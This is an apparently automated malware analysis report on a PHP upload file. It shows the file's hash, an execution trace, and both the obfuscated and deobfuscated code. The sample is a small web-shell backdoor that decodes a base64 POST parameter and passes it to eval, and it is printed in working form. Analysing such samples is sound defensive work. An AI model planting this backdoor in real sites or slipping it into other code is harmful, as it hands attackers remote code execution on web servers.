PHP Malware Analysis

1.php

md5: 5899c9f275cb3bf036f0007ac2ffcdda


Attributes

Encoding

Execution

Input


Deobfuscated PHP code

<?php

$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower("base64_decode");
$wtlx07 = "_POST";
if (isset($_POST['nf03c87'])) {
    eval($jti9($_POST['nf03c87']));
}

Execution traces

data/traces/5899c9f275cb3bf036f0007ac2ffcdda_trace-1676257266.2953.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:01:32.193129]
1	0	1	0.000314	393464
1	3	0	0.000404	396816	{main}	1		/var/www/html/uploads/1.php	0	0
1		A						/var/www/html/uploads/1.php	2	$mfpc56 = '6atc4d_poesb'
2	4	0	0.000444	396856	strtolower	0		/var/www/html/uploads/1.php	3	1	'base64_decode'
2	4	1	0.000460	396888
2	4	R			'base64_decode'
1		A						/var/www/html/uploads/1.php	3	$jti9 = 'base64_decode'
2	5	0	0.000487	396888	strtoupper	0		/var/www/html/uploads/1.php	4	1	'_post'
2	5	1	0.000500	396952
2	5	R			'_POST'
1		A						/var/www/html/uploads/1.php	4	$wtlx07 = '_POST'
1	3	1	0.000526	396888
			0.000558	314408
TRACE END   [2023-02-13 01:01:32.193465]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower($mfpc56[11] . $mfpc56[1] . $mfpc56[10] . $mfpc56[9] . $mfpc56[0] . $mfpc56[4] . $mfpc56[6] . $mfpc56[5] . $mfpc56[9] . $mfpc56[3] . $mfpc56[8] . $mfpc56[5] . $mfpc56[9]);
$wtlx07 = strtoupper($mfpc56[6] . $mfpc56[7] . $mfpc56[8] . $mfpc56[10] . $mfpc56[2]);
if (isset (${$wtlx07} ['nf03c87'])) {
    eval($jti9 (${$wtlx07}['nf03c87']));
}